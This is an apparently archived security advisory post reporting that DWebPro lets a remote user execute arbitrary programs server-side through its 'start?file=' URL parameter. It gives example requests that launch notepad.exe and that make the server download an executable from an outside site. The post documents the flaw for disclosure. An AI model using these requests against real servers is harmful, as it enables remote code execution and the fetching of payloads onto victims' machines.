AOH :: HP Unsorted D :: BT-21837.HTM

DWebPro allow an invader to execute any program at server side



DWebPro allow an invader to execute any program at server side
DWebPro allow an invader to execute any program at server side



The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe¶ms=C:\hi.txt 

And the notepad.exe will open a txt file that calls hi at C:\ server's side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file. 

It's really dangerous.

I tested this at last version but may work at older versions as well.

Best Regards,

Rafael Sousa

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.